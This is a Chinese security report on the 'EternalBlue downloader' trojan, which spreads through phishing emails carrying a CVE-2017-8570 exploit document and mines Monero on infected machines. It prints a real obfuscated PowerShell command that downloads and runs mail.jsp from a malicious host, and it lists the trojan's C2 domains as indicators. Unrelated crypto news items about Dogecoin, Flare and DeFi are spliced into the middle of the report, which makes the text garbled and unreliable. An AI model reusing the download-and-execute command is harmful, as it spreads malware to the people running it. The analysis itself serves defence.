DEF:“永恒之藍下載器木馬”新增釣魚郵件傳播，利用用戶機器挖礦門羅幣

來源：騰訊御見威脅情報中心

編者注：原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播，附件含CVE-2017-8570漏洞攻擊代碼》

“永恒之藍”下載器木馬在感染用戶機器上運行后，會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔，該文檔附帶CVE-2017-8570漏洞攻擊代碼。

如果被攻擊用戶收到郵件并不慎打開文檔，就可能觸發漏洞執行Powershell命令下載mail.jsp：

狗狗幣聯合創始人：盡管已離開項目但仍持有“少量DOGE”:金色財經報道，Billy Markus是2013年推出的meme項目狗狗幣的兩位聯合創始人之一，最近他在社交媒體上對加密社區的一些傳言進行了澄清。Billy Markus表示，他已經9年沒有研究狗狗幣，目前與該項目沒有任何關系，而且也不代表狗狗幣團隊發言。不過，Billy Markus承認自己擁有“非常少量的DOGE代幣”。針對加密社區希望他重新代表狗狗幣項目，Billy Markus表示到目前為止他唯一能代表的人就是他自己。[2023/4/2 13:40:21]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

Flare CEO：FIP 01提案旨在改善代幣分配模式并鼓勵參與網絡:1月23日消息，Flare Networks聯合創始人兼CEO Hugo Philion近日在推特上分享自己對FIP 01提案的看法。這個存在爭議的提案旨在改善代幣分配模式，減少通貨膨脹，同時鼓勵參與網絡。

Philion首先承認這個提案可能使一些人感到被Flare背叛。 然后他解釋稱，他們的意圖不是忽視這些感覺，而是解決之前模式的問題，以促進代幣從那些不想長期持有的人那里更順利地重新分配給那些想要長期持有的人。

Phillioin還表示，其設計靈感來自于比特幣，并打算用比最初預期更多的代幣來獎勵那些建設基礎設施的人。

Phillioin隨后強調，只有XRP持有者因為持有代幣而獲得FLR。FIP01的設計旨在將負面影響最小化，同時糾正舊的分配模型。Flare是唯一一個圍繞XRP生態系統構建的主要VC支持項目，我們也在圍繞其他網絡進行建設，但我們保留了XRP。社區不明白，說服加密VC系統支持任何涉及XRP的事情是多么不可能。盡管面臨困境，他仍然對FIP01抱有信心，因為他相信如果執行得當，Flare可以“為整個行業提供價值，甚至可能擴展該行業”。（U.Today）[2023/1/23 11:27:18]

而下載使用的域名ap35nf7.jp實際上并沒有注冊，但是依然能夠解析到地址：t.awcna.com，是因為被感染機器的本地hosts文件被篡改，使得隨機生成的域名映射到木馬使用的惡意地址，細節請參考御見威脅情報中心此前發布的報告：《“永恒之藍下載器”木馬篡改hosts指向隨機域名，再用多個漏洞攻擊內網挖礦》。

數據：DeFi協議TVL年初至今增長近20%，約84億美元資金回流:1月17日消息自今年年初以來，DeFi抵押品一直在增加。DeFi協議中鎖定抵押品的價值在十周內首次超過500億美元。此外，自今年年初以來，TVL增長了近20%。根據DeFi Llama的數據，TVL目前為528億美元，是自2022年11月9日以來的最高水平。在過去七天里，大多數主要DeFi協議的抵押品都出現了兩位數的增長。自1月1日的周期低點以來，約有84億美元回流到DeFi生態系統。

據其分析，這在很大程度上可以歸因于隨著市場反彈，基礎加密資產的上漲。還應該指出的是，DeFi TVL仍比2021年12月的峰值水平低75%。

除了抵押品價值增加，流動性質押衍生品一直在引領市場。Lido目前擁有14.75%的市場占比，反超MakerDAO（市場占比為13.25%），在DeFi市場中位居首位。（BeInCrypto）[2023/1/17 11:16:43]

本次攻擊過程中，木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp經過高度混淆，多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行，并使用了新的計劃任務名：

“Bluetea“藍茶。

“永恒之藍”下載器木馬自出現之后從未停止更新，從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺，并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上，最初通過供應鏈攻擊積累一批感染機器后，又不斷利用”永恒之藍”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法進行擴散傳播，近期又增加了DGA域名攻擊和釣魚郵件攻擊，其最終目的只為利用用戶機器挖礦門羅幣獲利。

永恒之藍下載器木馬的歷次版本更新參考下表：

安全建議

1.建議用戶不要輕易打開不明來源的郵件附件，對于郵件附件中的文件要格外謹慎運行，如發現有腳本或其他可執行文件可先使用殺軟件進行掃描；

2.服務器使用安全的密碼策略，特別是IPC$、MSSQL、RDP賬號密碼，切勿使用弱口令，避免遭遇弱密碼爆破攻擊；

3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570，需進行漏洞掃描和修復，或采用WindowsUpdate進行。

IOCs

http//t.awcna.com/mail.jsp

Tags：DEFIEFIDEFFlareDogDeFiCoindefiai幣被盜Eco DeFiflare幣值得投資嗎

ADA